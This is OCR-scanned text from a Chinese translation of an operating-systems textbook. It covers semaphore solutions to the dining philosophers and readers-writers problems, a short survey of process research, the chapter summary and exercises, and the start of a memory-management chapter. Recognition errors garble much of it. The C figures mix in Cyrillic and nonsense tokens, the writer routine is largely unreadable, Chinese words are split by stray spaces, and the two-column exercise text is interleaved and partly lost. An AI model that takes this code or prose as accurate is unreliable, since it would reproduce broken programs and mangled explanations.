statefi] = THINKING; ї* 哲学 家 已 经 就 餐 完 毕 Y 
test(LEFT); I 检查 左边 的 邻居 现在 可 以 吃 吗 */ 
test(RIGHT); 1* 检查 右边 的 邻居 现在 可 以 吃 吗 */ 
up(&mutex); ARFER */ 
1 
void test(i) (кі. 哲学 家 编号 ， 从 0 到 N 一 1 */ 
{ 
if (stateli] == HUNGRY && state[LEFT] != EATING && state[RIGHT] != EATING) { 
э! ATING; 
ир(&5[й); 
} 


图 2-46 哲学 家 就 餐 问 题 的 一 个 解法 


该 程序 使 用 了 一 个 信号 量 数组 ， 每 个 信号 量 对 应 一 位 哲学 家 ， 这 样 在 所 需 的 叉子 被 占用 时 ， 想 进餐 
的 哲学 家 就 被 阻塞 。 注 意 ， 每 个 进程 将 过 程 philosopher 作 为 主 代码 运行 ， 而 其 他 过 程 take_forks、 
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put_forks 和 test 只 是 普通 的 过 程 ， 而 非 单独 的 进程 。 


2.5.2 读者 - 写 者 问题 

哲学 家 就 餐 问 题 对 于 互 斥 访问 有 限 资 源 的 竞争 问题 (如 I/O 设 备 ) 一 类 的 建 模 过 程 十 分 有 用 。 另 一 
个 著名 的 问题 是 读者 一 写 者 问题 (Courtois 等 人 ，1971) ， 它 为 数据 库 访 问 建立 了 一 个 模型 。 例 如 ， 设 想 
一 个 飞机 订 票 系统 ， 其 中 有 许多 竞争 的 进程 试图 读 写 其 中 的 数据 。 多 个 进程 同时 读数 据 库 是 可 以 接受 的 ， 
但 如 果 一 个 进程 正在 更 新 ( 写 ) 数据 库 ， 则 所 有 的 其 他 进程 都 不 能 访问 该 数据 库 ， 即 使 读 操作 也 不 行 。 
这 里 的 问题 是 如 何 对 读者 和 写 者 进行 编程 ”图 2-47 给 出 了 一 种 解法 。 

在 该 解法 中 ， 第 一 个 读者 对 信号 量 db 执行 down 操 作 。 随 后 的 读者 只 是 递增 一 个 计数 器 rc。 当 读者 
离开 时 ， 它 们 递减 这 个 计数 器 ， 而 最 后 一 个 读者 则 对 信号 量 执行 up， 这 样 就 允许 一 个 被 阻塞 的 写 者 (如 
果 存在 的 话 ) 可 以 访问 该 数据 库 。 

在 该 解法 中 ， 隐 含 着 一 个 需要 注解 的 条 件 。 假 设 一 个 读者 正 使 用 数据 库 ， 另 一 个 读者 来 了 。 同 时 有 
两 个 读者 并 不 存在 问题 ， 第 二 个 读者 被 允许 进入 。 如 果 有 第 三 个 和 更 多 的 读者 来 了 也 同样 允许 。 

现在 ， 假 设 一 个 写 者 到 来 。 由 于 写 者 的 访问 是 排他 的 ， 不 能 允许 写 者 进入 数据 库 ， 只 能 被 挂 起 。 只 
要 还 有 一 个 读者 在 活动 ， 就 允许 后 续 的 读者 进来 。 这 种 策略 的 结果 是 ， 如 果 有 一 个 稳定 的 读者 流 存在 ， 
那么 这 些 读者 将 在 到 达 后 被 允许 进入 。 而 写 者 就 始终 被 挂 起 ， 直 到 没有 读者 为 止 。 如 果 来 了 新 的 读者 ， 
比如 ， 每 2 秒 钟 一 个 ， 而 每 个 读者 花费 5 秒 钟 完成 其 工作 ， 那 么 写 者 就 永远 没有 机 会 了 。 

为 了 避免 这 种 情形 ， 可 以 稍微 改变 一 下 程序 的 写法 : 在 一 个 读者 到 达 ， 且 一 个 写 者 在 等 待 时 ， 读 者 
在 写 者 之 后 被 挂 起 ， 而 不 是 立即 允许 进入 。 用 这 种 方式 ， 在 一 个 写 者 到 达 时 如 果 有 正在 工作 的 读者 ， 那 
么 该 写 者 只 要 等 待 这 个 读者 完成 ， 而 不 必 等 候 其 后 面 到 来 的 读者 。 该 解决 方案 的 缺点 是 ， 并 发 度 和 效率 
较 低 。Courtois 等 人 给 出 了 一 个 写 者 优先 的 解法 。 详 细 内 容 请 参阅 他 的 论文 。 


typedef int semaphore; I ZMR R */ 


semaphore mutex = 1; ї* 控制 对 rc 的 访问 */ 
semaphore db = 1; 闫 控制 对 数据 库 的 访问 */ 
intre=0; M 正在 读 或 者 即将 读 的 进程 数目 */ 


void геайег(уоіа) 
{ 


while (TRUE) { 1* 无 限 循环 */ 


down(&mutex); 挛 获得 对 rc 的 互 斥 访问 权 */ 
гс=1с+ 1; 位 现 在 又 多 了 一 个 读者 */ 
if (rc == 1) down(&db); /* 如 果 这 是 第 一 个 读者 …… */ 
up(&mutex); 个 Же) Н ЛЕНЕ */ 
read_data_base(); 位 访问 数据 */ 
down(&mutex); 上 # 获取 对 rc 的 互 斥 访问 */ 
= 一 个 现在 减少 了 一 个 读者 * 
if (rc == 0) up(&db); 
up(&mutex); 
} use_data_read(); (е 非 临界 区 */ 
} 
void writer(void) 
while TRUE){ amm И 
Раа): штуу 


н 人" 更 新 数据 */ 
шш ГГ 


图 2-47 读者 - 写 者 问题 的 一 种 解法 
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2.6 有 关 进 程 和 线程 的 研究 

在 第 1 章 里 ， 我 们 介绍 了 有 关 操 作 系 统 结构 的 当前 研究 工作 。 在 本 章 和 下 一 章 里 ， 我 们 将 更 专注 于 
有 关 进 程 的 研究 。 随 着 时 间 推 移 ， 一 些 问题 会 比 其 他 问题 解决 得 更 好 。 多 数 研究 倾向 于 从 事 新 的 课题， 
而 不 是 围绕 着 有 数 十 年 历史 的 题目 进行 研究 。 

作为 一 个 例子 ， 关 于 进程 概念 的 研究 已 经 获得 良好 的 解决 方案 。 几乎 所 有 的 系统 都 把 一 个 进程 视 为 
-个 容器 ， 该 容器 用 以 聚集 相关 的 资源 ， 如 地 址 空间 、 线 程 、 打开 的 文件 、 保 护 许可 等 。 不 同 的 系统 聚 
集资 源 的 方式 略 有 差别 ， 但 是 差别 仅 在 于 工程 处 理 方面 。 基本 思想 不 会 有 较 大 的 争议 ， 且 有 关 进程 的 课 
题 也 几乎 没有 新 的 研究 在 进行 。 

线程 是 比 进程 更 新 的 概念 ， 但 是 它们 同样 也 经 过 了 相当 多 的 考虑 。 仍然 偶尔 会 出 现 关于 线程 的 论文 ， 
例如 ， 关 于 在 多 处 理 器 上 的 线程 集群 (Tam 等 人 ，2007) 或 是 一 个 进程 中 的 线程 数量 如 何 扩展 到 100 000 
(Von Веһгеп A, 2003), 

现在 ， 进 程 同 步 问 题 已 经 相当 成 熟 和 固定 ， 但 是 每 隔 一 段 时 间 还 是 会 有 一 篇 论文 ， 例如 关于 无 锁 并 
发 处 理 的 问题 (Fraser 和 Harris，2007) 或 是 实时 系统 中 的 无 阻塞 同步 问题 (Hohmuth 和 Haertig，2001) 。 

调度 ( 单 处 理 器 和 多 处 理 器 ) 还 是 一 些 研究 者 感 兴趣 的 话题 。 一 些 正在 研究 的 主题 包括 移动 设备 上 
的 能 耗 节省 调度 (Yuan 和 Nahrstedt，2006) 、 超 线程 级 调度 (Bulpin 和 Pratt，2005) 、 当 CPU 空 闪 时 该 做 
什么 (Eggert 和 Touch，2005) 以 及 虚拟 时 间 调 度 (Nieh 等 人 ，2001)。 但 是 ， 很 少 有 实际 系统 的 设计 者 
会 因为 缺乏 像样 的 线程 调度 算法 而 整 天 苦恼， 所 以 这 似乎 是 一 个 由 研究 者 推动 而 不 是 需求 推动 的 研究 类 
型 。 总 而 言 之 ， 进 程 、 线 程 与 调度 不 像 它们 曾经 那样 ， 是 研究 的 热点 。 这 些 研究 已 经 前 进 得 很 多 了 。 


2.7 小 结 

为 了 隐蔽 中 断 的 影响 ， 操 作 系 统 提供 了 一 个 由 并 行 运行 的 顺序 进程 组 成 的 概念 模型 。 进程 可 以 动态 
地 创建 和 终止 。 每 个 进程 都 有 自己 的 地 址 空间 。 

对 于 某 些 应 用 而 言 ， 在 一 个 进程 中 使 用 多 个 控制 线程 是 有 益 的 。 这 些 线程 被 独立 调度 ， 每 个 线程 有 
自己 的 堆栈 ， 但 是 在 一 个 进程 中 的 所 有 线程 共享 一 个 公共 地 址 空间 。 线程 可 以 在 用 户 空间 或 内 核 中 实现 。 

进程 之 间 通过 进程 间 通 信和 原 语 彼此 通信 ， 如 信号 量 、 管 程 或 消息 。 这 些 原 语 用 来 确保 同一 时 刻 不 会 
有 两 个 进程 在 临界 区 中 ， 免 除了 出 现 混乱 的 情形 。 进程 可 以 处 在 运行 、 可 运行 或 阻塞 状态 ， 并 且 在 该 进 
程 或 其 他 进程 执行 某 个 进程 间 通信 原 语 时 ， 可 以 改变 其 状态 。 线 程 间 通 信也 是 类 似 的 。 

进程 间 通 信 原 语 可 以 用 来 解决 诸如 生产 者 -消费 者 问题 、 哲学 家 就 餐 问 题 和 读者 - 写 者 问题 等 。 即 
便 有 了 这 些 原 语 ， 也 要 仔细 设计 以 避免 出 错 和 死 锁 。 

已 经 有 一 大 批 研究 出 来 的 调度 算法 。 某 些 算法 主要 用 于 批 处 理 系 统 中 ， 如 最 短 作业 优先 调度 算法 。 
其 他 算法 常用 在 批 处 理 系统 和 交互 式 系统 中 ， 它们 包括 轮转 调度 、 优 先 级 调度 、 多 级 队列 、 保证 调度 、 
彩票 调度 以 及 公平 分 享 调度 等 。 有 些 系统 将 调度 策略 和 调度 机 制 清晰 地 分 离 ， 这 样 可 以 使 用 户 对 调度 算 
法 进行 控制 。 
习题 
:图 2-2 中 给 出 了 三 个 进程 状态 。 在 理论 上 ， 三 个 为 什么 ? 
状态 可 以 有 六 种 转换 ， 每 个 状态 两 个 。 但 是 ， 5. 多 个 作业 能 够 并 行 运行 ， 比 它们 顺序 执行 完成 
图 中 只 给 出 了 四 种 转换 。 有 没有 可 能 发 生 其 他 的 要 快 。 假 设 有 两 个 作业 同时 开始 执行 ， 每 个 
两 种 转换 中 的 一 个 或 两 个 ? 需要 10 分 钟 的 CPU 时 间 。 如 果 顺 序 执行 ， 那 么 
“假设 要 设计 一 种 先进 的 计算 机 体系 结构 ， 它 使 用 最 后 一 个 作业 需要 多 长 时 间 可 以 完成 ? 如 果 并 
硬件 而 不 是 中 断 来 完成 进程 切换 。CPU 需 要 哪些 行 执行 又 需要 多 长 时 间 ? 假设 O 等 待 占 50%。 
信息 ?请 描述 用 硬件 完成 进程 切换 的 工作 过 程 。 6. 在 本 章 中 说 明 的 图 2-11a 的 模式 不 适合 用 于 使 用 
在 所 有 当代 计算 机 中 ， 至 少 有 部 分 中 断 处 理 程 内 存 高 速 缓存 的 文件 服务 器 。 为 什么 不 适合 ? 
序 是 用 汇编 语言 编写 的 。 为 什么 ? 每 个 进程 可 以 有 自己 的 高 速 缓存 吗 ? 
当中 断 或 系统 调用 把 控制 转 给 操作 系统 时 ， 通 7. 如 果 创 建 一 个 多 线程 进程 ， 若 子 进程 得 到 全 部 
常 将 内 核 堆栈 和 被 中 断 进 程 的 运行 堆栈 分 离 。 父 进程 线程 的 副本 ， 会 出 现 问题 。 假 如 原 有 线 
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程 之 一 正在 等 待 键盘 输入 ， 现 在 则 成 为 两 个 线 
程 在 等 待 键盘 输入 ， 每 个 进程 有 一 个 。 在 单线 
程 进 程 中 也 会 发 生 这 种 问题 吗 ? 

8. 在 图 2-8 中 ， 给 出 了 一 个 多 线程 Web 服 务 器 。 如 
果 读 取 文 件 的 惟一 途径 是 正常 的 阻塞 read 系 统 
调用 ， 那 么 Web 服 务 器 应 该 使 用 用 户 级 线程 还 
是 内 核 级 线程 ? 为 什么 ? 

9. 在 本 章 中 ， 我 们 介绍 了 多 线程 Web 服 务 器 ， 说 
明 它 比 单线 程 服务 器 和 有 限 状 态 机 服务 器 更 好 
的 原因 。 存 在 单线 程 服务 器 更 好 一 些 的 情形 
吗 ? 请 给 出 一 个 例子 。 

10. 在 图 2-12 中 寄存 器 集合 按 每 个 线程 中 的 内 容 列 
出 而 不 是 按 每 个 进程 中 的 内 容 列 出 。 为 什么 ? 
毕竟 机 器 只 有 一 套 寄存 器 。 

中 .为 什么 线程 要 通过 调用 thread_yield 自 愿 放弃 
CPU? 毕竟 ， 由 于 没有 周期 性 的 时 钟 中 断 ， 线 
程 可 以 不 交 回 CPU。 

12. 线程 可 以 被 时 钟 中 断 抢 占 吗 ? 如 果 可 以 ， 什 么 
情形 下 可 以 ? 如 果 不 可 以 ， 为 什么 不 可 以 ? 
13. 在 本 习题 中 ， 要求 对 使 用 单线 程 文件 服务 器 和 

多 线程 文件 服务 器 读 取 文件 进行 比较 。 假 设 所 

据 都 在 块 高 速 缓存 中， 花费 15ms 获 

,分 派 工作 ,并 处 理 其 余 必 要 工作 。 

之 一 时 间 时 ， 需 要 一 个 磁盘 操作 ， 
要 另外 花费 75ms ， 此 时 该 线程 进入 睡眠 。 在 
单线 程 情形 下 服务 器 每 秒 钟 可 以 处 理 多 少 个 请 
R? 如 果 是 多 线程 呢 ? 

14. 在 用 户 空间 实现 线程 ， 其 最 大 的 优点 是 什么 ? 
最 大 的 缺点 是 什么 ? 

15. 在 图 2-15 中 创建 线程 和 线程 打印 消息 是 随机 交 
织 在 一 起 的 。 有 没有 方法 可 以 严格 按照 以 下 次 
序 运 行 创建 线程 1， 线 程 1 打印 消息 ， 线 程 1 
结束 创建 线程 2， 线 程 2 打印 消息 ， 线 程 2 结 
Ж, 以 此 类 推 。 如 果 有 ， 是 什么 方法 ， 如 果 没 
有 请 解释 原因 。 

16. 在 讨论 线程 中 的 全 局 变量 时 ， 曾 使 用 过 程 
create_global 将 存储 分 配给 指向 变量 的 指针 ， 
而 不 是 变量 自身 。 这 是 必需 的 ， 还 是 由 于 该 过 
程 也 需要 使 用 这 些 值 ? 

17. 考虑 线程 全 部 在 用 户 空间 实现 的 一 个 系统 ， 其 
中 运行 时 系统 每 秒 钟 得 到 一 个 时 钟 中 断 。 假 设 
在 该 运行 时 系统 中 ， 当 某 个 线程 正在 执行 时 发 
生 一 个 时 钟 中 断 ， 此 时 会 出 现 什么 问题 ?你 有 
什么 解决 该 问题 的 建议 吗 ? 

18. 假设 一 个 操作 系统 中 不 存在 类 似 于 select 的 系 
统 调用 来 提前 了 解 在 从 文件 、 管 道 或 设备 中 读 


取 时 是 否 安全 ， 不 过 该 操作 系统 确实 允许 设置 
报警 时 钟 ， 以 便 中 断 阻塞 的 系统 调用 。 在 上 述 
条 件 下 ， 是 否 有 可 能 在 用 户 空间 中 实现 一 个 线 
程 包 ? 请 加 以 讨论 。 

19. 在 2.3.4 节 中 所 讨论 的 优先 级 反 转 问题 是 否 可 能 
在 用 户 级 线程 中 发 生 ? 为 什么 ? 

20. 在 2.3.4 节 中 ， 描 述 了 一 种 有 高 优先 级 进程 和 
低 优先 级 进程 L 的 情况 ， 导 致 了 H 陷 人 死 循环 。 
若 采用 轮转 调度 算法 而 不 是 优先 级 调度 算法 ， 
还 会 发 生 同 样 问 题 吗 ? 请 给 予 讨论 。 

- 在 使 用 线程 的 系统 中 ， 若 使 用 用 户 级 线程 ， 是 
每 个 线程 一 个 堆栈 还 是 每 个 进程 一 个 堆栈 ?如 
果 使 用 内 核 级 线程 情况 又 如 何 呢 ? 请 给 予 解释 。 

22. 在 开发 计算 机 时 ， 通 常 首先 用 一 个 程序 模拟 ， 
一 次 运行 一 条 指令 ， 甚 至 多 处 理 器 也 严格 按 此 
模拟 。 在 类 似 于 这 种 没有 同时 事件 发 生 的 情形 
下 ， 会 出 现 竞争 条 件 吗 ? 

. 两 个 进程 在 一 个 共享 存储 器 多 处 理 器 ( 即 两 个 

i 当 它 们 要 共享 一 个 公共 内 存 时 ， 
图 2-23 所 示 的 采用 变量 turn 的 忙 等 待 解决 方案 
还 有 效 吗 ? 

. 在 进程 调度 是 抢占 式 的 情形 下 ， 图 2-24 中 展示 
的 互 斥 问题 的 Peterson 解 法 能 正常 工作 吗 ? 如 
果 是 非 抢占 式 的 情况 呢 ? 

.给 出 一 个 可 以 屏 项 中 断 的 操作 系统 如 何 实现 信 
号 量 的 框架 。 

.请 说 明 计数 信号 量 ( 即 可 以 保持 一 个 任意 值 的 
信号 量 ) 如 何 仅 通过 二 元 信号 量 和 普通 机 器 指 
令 实现 。 

- 如 果 一 个 系统 只 有 两 个 进程 ， 可 以 使 用 一 个 屏 
障 来 同步 这 两 个 进程 吗 ? 为 什么 ? 

- 如 果 线程 在 内 核 中 实现 ， 可 以 使 用 内 核 信 号 量 
对 同一 个 进程 中 的 两 个 线程 进行 同步 吗 ? 如果 
线程 在 用 户 空间 实现 呢 ? 假设 在 其 他 进程 中 没 
有 线程 必须 访问 该 信号 量 。 请 讨论 你 的 答案 。 

- 管 程 内 的 同步 机 制 使 用 条 件 变量 和 两 个 特殊 操 
作 wait 和 signal。 一 种 更 通用 的 同步 形式 是 只 
用 一 条 原 语 waituntil， 它 以 任意 的 布尔 谓词 作 
为 参数 。 例 如 
waituntlx<0 or y+z<n 
这 样 就 不 再 需要 signal 原 语 。 很 显然 这 一 方式 
比 Hoare 或 Brinch Hansen 方 案 更 通用 ， 但 它 从 
未 被 采用 过 。 为 什么 ?提示 : 请 考虑 其 实现 。 

30. 一 个 快餐 店 有 四 类 雇员 : (1) 领班 ， 接 收 顾 客 

点 的 菜单 ，(2) 厨师 ， 准 备 饭菜 ，(3) 打包 
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工 ， 将 饭菜 装 在 袋子 里 ，(4) 收银 员 ， 将 食品 
袋 交 给 顾客 并 收 钱 。 每 个 雇员 可 被 看 作 一 个 进 
行 通信 的 顺序 进程 。 它 们 采用 的 进程 间 通 信 方 
式 是 什么 ? 请 将 这 个 模型 与 UNIX 中 进程 联系 
起 来 。 

31. 假设 有 一 个 使 用 信箱 的 消息 传递 系统 ， 当 向 满 
信箱 发 消息 或 从 空 信箱 收 消 息 时 ， 进 程 都 不 会 
阻塞 ， 相反， 会 得 到 一 个 错误 代码 。 进 程 响 应 
错误 代码 的 处 理 方式 为 一 遍 一 遍地 重 试 ， 直 到 
成 功 为 止 。 这 种 方式 会 导致 竞争 条 件 吗 ? 

32. CDC 6600 计 算 机 使 用 一 种 称 作 处 理 器 共享 的 
有 趣 的 轮转 调度 算法 ， 它 可 以 同时 处 理 多 达 10 
个 IO 进程 。 每 条 指令 结束 后 都 进行 进程 切换 ， 
这 样 进程 1 执行 指令 1， 进 程 2 执行 指令 2， 以 此 
类 推 。 进 程 切换 由 特殊 硬件 完成 ， 所 以 没有 开 
销 。 如 果 在 没有 竞争 的 条 件 下 一 个 进程 需要 7 
秒 钟 完 成 ， 那 么 当 有 个 进程 共享 处 理 器 时 完 
成 一 个 进程 需要 多 长 时 间 ? 

33. 是 否 可 以 通过 分 析 源 代码 来 确定 进程 是 CPU 密 
集 型 的 还 是 MO 密集 型 的 ? 如何 能 在 运行 时 刻 
进行 此 项 决定 ? 

34. 在 “ 何 时 调度 ”一 节 中 曾 提 到 ， 有 时 一 个 重要 
进程 可 以 在 选择 下 一 个 被 阻塞 进程 进入 运行 的 
过 程 中 发 挥 作用 ， 从 而 改善 调度 性 能 。 请 给 出 
可 以 这 样 做 的 情形 并 解释 如 何 做 。 

35. 对 某 系统 进行 监测 后 表明 ， 当 阻塞 在 1O 之 前 
时 ， 平 均 每 个 进程 运行 时 间 为 T。 一 次 进程 切 
换 需要 的 时 间 为 Ss， 这 里 5 实际 上 就 是 开销 。 对 
于 采用 时 间 片 长 度 为 @ 的 轮转 调度 ， 请 给 出 以 
下 各 种 情况 中 CPU 利用 率 的 计算 公式 : 
а0= = 
b)Q>T 
c) $<0<Т 
d) 9=5 
e) @ 趋 近 于 0 

36. 有 5 个 待 运行 作业 ， 估 计 它 们 的 运行 时 间 分 别 
是 9，6，3，5 和 X。 采 用 哪 种 次 序 运行 这 些 作 
业 将 得 到 最 短 的 平均 响应 时 间 ? (答案 将 依赖 
于 X。) 

37. 有 5 个 批 处 理 作业 A 到 E， 它 们 几乎 同时 到 达 一 
个 计算 中 心 。 估 计 它 们 的 运行 时 间 分 别 为 10， 
6，2，4 和 8 分 钟 。 其 优先 级 (由 外 部 设 定 ) 分 
别 为 3，5，2，1 和 4， 其 中 5 为 最 高 优先 级 。 对 
于 下 列 每 种 调度 算法 ， 计 算 其 平均 进程 周转 时 
间 ， 可 忽略 进程 切换 的 开销 。 

a) 轮转 法 。 


38. 


39. 


44. 


45. 


46. 


47. 


48. 


b) 优先 级 调度 。 

日 先 来 先 服务 (按照 0O，6，2，4，8 次 序 运行 )。 
4) 最 短 作业 优先 。 

对 a) ， 假 设 系统 具有 多 道 程 序 处 理 能 力 ， 每 个 
作业 均 公平 共享 CPU 时 间 ， 对 b) 到 d) ， 假 设 任 
一 时 刻 只 有 一 个 作业 运行 ， 直 到 结束 。 所 有 的 
作业 都 完全 是 CPU 密集 型 作业 。 

运行 在 CTSS 上 的 一 个 进程 需要 30 个 时 间 片 完 
成 。 该 进程 必须 被 调 入 多 少 次 ， 包 括 第 一 次 
(在 该 进程 运行 之 前 ) ? 

能 找到 一 个 使 CTSS 优 先 级 系统 不 受 随 机 回 车 
EBAI A? 


-a = 1/2 的 老化 算法 用 来 预测 运行 时 间 。 先 前 


运行 ， 从 最 老 的 一 个 到 最 近 的 一 个 ， 其 
间 分 别 是 40ms，20ms，40ms 和 1sms。 
下 一 次 的 预测 时 间 是 多 少 ? 


“一 个 软 实时 系统 有 4 个 周期 时 间 ， 其 周期 分 别 


为 30ms，100ms，200ms 和 250ms。 假 设 这 4 个 
事件 分 别 需要 35ms，20ms，10ms 和 x ms 的 CPU 
时 间 。 保 持 系统 可 调度 的 最 大 x 值 是 多 少 ? 


.请 解释 为 什么 两 级 调度 比较 常用 。 


要 处 理 两 个 语音 通信 ， 每 个 运 
突 发 消耗 Ims CPU 时 间 ， 加 
-个 视频 ， 每 一 帧 需要 20ms 的 
CPU 时 间 。 这 个 系统 是 可 调度 的 吗 ? 
考虑 一 个 系统 ， 在 这 个 系统 中 为 了 内 核 线程 调 
度 希 望 将 策略 和 机 制 分 离 。 请 提出 一 个 实现 此 
目标 的 手段 。 
在 哲学 家 就 餐 问题 的 解法 (图 2-46) 中 ， 为 什 
么 在 过 程 take_forks 中 将 状态 变量 置 为 
HUNGRY? 
考虑 图 2-46 中 的 过 程 put_forks， 假 设 变量 stareli] 
在 对 test 的 两 次 调用 之 后 而 不 是 之 前 被 置 为 
THINKING。 这 个 改动 会 对 解法 有 什么 影响 ? 
按照 哪 一 类 进程 何 时 开始 ， 读 者 - 写 者 问题 可 
以 有 若干 种 方式 求解 。 请 详细 描述 该 问题 的 三 
种 变 体 ， 每 一 种 变 体 偏好 (或 不 偏好 ) 某 一 类 
进程 。 对 每 种 变 体 ， 请 指出 当 一 个 读者 或 写 者 
访问 数据 库 时 会 发 生 什么 ， 以 及 当 一 个 进程 结 
东 对 数据 库 的 访问 后 又 会 发 生 什么 ? 
请 编写 一 个 shell 脚 本 ， 通 过 读 取 文件 的 最 后 一 
个 数字 ， 对 之 加 1， 然 后 再 将 该 数字 附 在 该 文 
-， 从 而 生成 顺序 数 文件 。 在 后 台 和 前 台 分 
了 该 脚本 的 一 个 实例 ， 每 个 实例 访问 相同 
的 文件 。 需 要 多 长 时 间 才 出 现 竞争 条 件 ? 临界 
区 是 什么 ?请 修改 该 脚本 以 避免 竟 争 (提示; 
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使 用 In file file.lock 锁 住 数据 文件 。) 

49. 假设 有 一 个 提供 信号 量 的 操作 系统 。 请 实现 一 
个 消息 系统 ， 编 写 发 送 和 接收 消息 的 过 程 。 
50. 使 用 管 程 而 不 是 信号 量 来 解决 哲学 家 就 餐 问题 。 
51. 假设 一 个 大 学 为 了 卖弄 其 政治 上 的 正确 性 ， 准 
备 把 美国 最 高 法 院 的 信条 “平等 但 隔离 其 本 身 
就 是 不 平等 (Separate but equal is inherently 
unequal)” 既 运用 在 种 族 上 也 运 在 性 别 上 ， 从 
而 结束 校园 内 长 期 使 用 的 浴室 按 性 别 隔离 的 做 
法 。 但 是 , 为 了 迁就 传统 习惯 , 学校 颁 布 法 令 : 
当 有 一 个 女生 在 浴室 里 ， 那 么 其 他 女生 可 以 进 
入 ， 但 是 男生 不 行 ， 反 之 亦 然 。 在 每 个 浴室 的 
门 上 有 一 个 滑动 指示 符号 ， 表 示 当 前 处 于 以 下 

三 种 可 能 状态 之 一 : 
©, 
“有 女生 。 


53. 


HRE. 

用 你 偏好 的 程序 设计 语言 编写 下 面 的 过 程 : 
woman_wants_to_enter, man_wants_to_enter, 
woman_leaves，man_leaves。 可 以 随意 采用 所 
希望 的 计数 器 和 同步 技术 。 


. 重 写 图 2-23 中 的 程序 ， 以 便 能 够 处 理 两 个 以 上 


编写 一 个 使 用 线程 并 共享 一 个 公共 缓冲 区 的 生 
产 者 -消费 者 问题 。 但 是 ， 不 要 使 用 信号 量 或 
任何 其 他 用 来 保护 共享 数据 结构 的 同步 原 语 。 
直接 让 每 个 线程 在 需要 访问 时 就 访问 。 使 用 
sleep 和 wakeup 来 处 理 满 和 空 的 条 件 。 观 察 需 
要 多 长 时 间 会 出 现 严重 的 竞争 条 件 。 例 如 ， 可 
以 让 生产 者 一 会 儿 打印 一 个 数字 ， 每 分 钟 打印 
不 要 超过 一 个 数字 ， 因 为 IO 会 影响 竞争 条 件 。 


第 3 章 存储 管理 


W (RAM) 是 计算 机 中 一 种 需要 认真 管理 的 重要 资源 。 就 目前 来 说 ， 虽 然 一 台 普 通 家 用 计算 机 的 
内 存 容 量 已 经 是 20 世 纪 60 年 代 早期 全 球 最 大 的 计算 机 IBM 7094 的 内 存 容 量 的 10 000 倍 以 上 ， 但 是 程序 大 
小 的 增长 速度 比 内 存 容量 的 增长 速度 要 快 得 多 。 正 如 帕 金 森 定律 所 指出 的 :“ 不 管 存储 器 有 多 大 ， 程 序 都 
可 以 把 它 填 满 "。 在 这 一 章 中 ， 我 们 将 讨论 操作 系统 是 怎样 对 内 存 创 建 抽象 模型 以 及 怎样 管理 内 存 的 。 

每 个 程序 员 都 梦想 拥有 这 样 的 内 存 ， 它 是 私有 的 、 容 量 无 限 大 的 、 速 度 无 限 快 的 ， 并 且 是 永久 性 的 
存储 器 ( 即 断 电 时 不 会 丢失 数据 )。 当 我 们 期 望 这 样 的 内 存 时 ， 何 不 进一步 要 求 它 价格 低廉 呢 ?” 遗 憾 的 
是 ,目前 的 技术 还 不 能 为 我 们 提供 这 样 的 内 存 。 也 许 你 会 有 解决 方案 。 

除 此 之 外 的 选择 是 什么 呢 ? 经 过 多 年 探索 ， 人 们 提出 了 “分 层 存储 器 体系 ”(memory hierarchy) 的 
概念 ， 即 在 这 个 体系 中 ， 计 算 机 有 若干 光 (MB) 快速 、 兄 贵 且 易 失 性 的 高 速 缓存 (cache) ， 数 千 兆 
(св) 速度 与 价格 适中 且 同 样 易 失 性 的 内 存 ， 以 及 几 兆 兆 (ТВ) 低速 、 廉 价 、 非 易 失 性 的 磁盘 存储 ， 另 
外 还 有 诸如 DVD 和 USB 等 可 移动 存储 装置 。 操 作 系统 的 工作 是 将 这 个 存储 体系 抽象 为 一 个 有 用 的 模型 并 
管理 这 个 抽象 模型 。 

操作 系统 中 管理 分 层 存 储 器 体系 的 部 分 称 为 存储 管理 器 (memory manager) 。 它 的 任务 是 有 效 地 管 
理 内 存 ， 即 记录 哪些 内 存 是 正在 使 用 的 ， 哪 些 内 存 是 空闲 的 ， 在 进程 需要 时 为 其 分 配 内 存 ， 在 进程 使 用 
完 后 释放 内 存 。 

本 章 我 们 会 研究 几 个 不 同 的 存储 管理 方案 ， 涵 盖 非常 简单 的 方案 到 高 度 复杂 的 方案 。 由 于 最 底层 的 
高 速 缓存 的 管理 由 硬件 来 完成 ， 本 章 将 集中 介绍 针对 编程 人 员 的 内 存 模型 ， 以 及 怎样 优化 管理 内 存 。 至 
于 永久 性 存储 器 一 一 磁盘 一 一 的 抽象 和 管理 , 则 是 下 一 章 的 主题 。 我 们 会 从 最 简单 的 管理 方案 开始 讨论 ， 
并 逐步 深入 到 更 为 续 密 的 方案 。 


3.1 无 存储 器 抽象 

最 简单 的 存储 器 抽象 就 是 根本 没有 抽象 。 早 期 大 型 计算 机 (20 世 纪 60 年 代 之 前 )、 小 型 计算 机 (20 
世纪 70 年 代 之 前 ) 和 个 人 计算 机 〈20 世 纪 80 年 代 之 前 ) 都 没有 存储 器 抽象 。 每 一 个 程序 都 直接 访问 物理 
内 存 。 当 一 个 程序 执行 如 下 指令 : 

MOV REGISTER1, 1000 


计算 机 会 将 位 置 为 1000 的 物理 内 存 中 的 内 容 移 到 REGISTER1 中 。 因 此 ， 那 时 呈现 给 编程 人 员 的 存储 器 
模型 就 是 简单 的 物理 内 存 : 从 0 到 某 个 上 限 的 地 址 集合 ， 每 一 个 地 址 对 应 一 个 可 容纳 一 定数 目 二 进 制 位 
的 存储 单元 ， 通 常 是 8 个 。 

在 这 种 情况 下 ， 要 想 在 内 存 中 同时 运行 两 个 程序 是 不 可 能 的 。 如 果 第 一 个 程序 在 2000 的 位 置 写 和 一 
个 新 的 值 ， 将 会 氛 掉 第 二 个 程序 存放 在 相同 位 置 上 的 所 有 内 容 ， 所 以 同时 运行 两 个 程序 是 根本 行 不 通 的 ， 
这 两 个 程序 会 立刻 崩溃 。 

不 过 即使 存储 器 模型 就 是 物理 内 存 ， 还 是 存在 一 些 可 行 选 项 的 。 图 3-1 展 示 了 三 种 变 体 。 在 图 3-1a 
中 ， 操 作 系统 位 于 RAM (随机 访问 存储 器 ) 的 底部 ， 在 图 3-lb 中 ， 操 作 系统 位 于 内 存 顶 端的 ROM (只 
读 存储 器 ) 中 ， 而 在 图 3-1c 中 ， 设 备 驱动 程序 位 于 内 存 顶 端的 ROM 中 ， 而 操作 系统 的 其 他 部 分 则 位 于 下 
面 的 RAM 的 底部 。 第 一 种 方案 以 前 被 用 在 大 型 机 和 小 型 计算 机 上 ， 现 在 很 少 使 用 了 。 第 二 种 方案 被 用 
在 一 些 棠 上 电脑 和 嵌入 式 系统 中 。 第 三 种 方案 用 于 早期 的 个 人 计算 机 中 (例如 运行 MS-DOS 的 计算 机 )， 
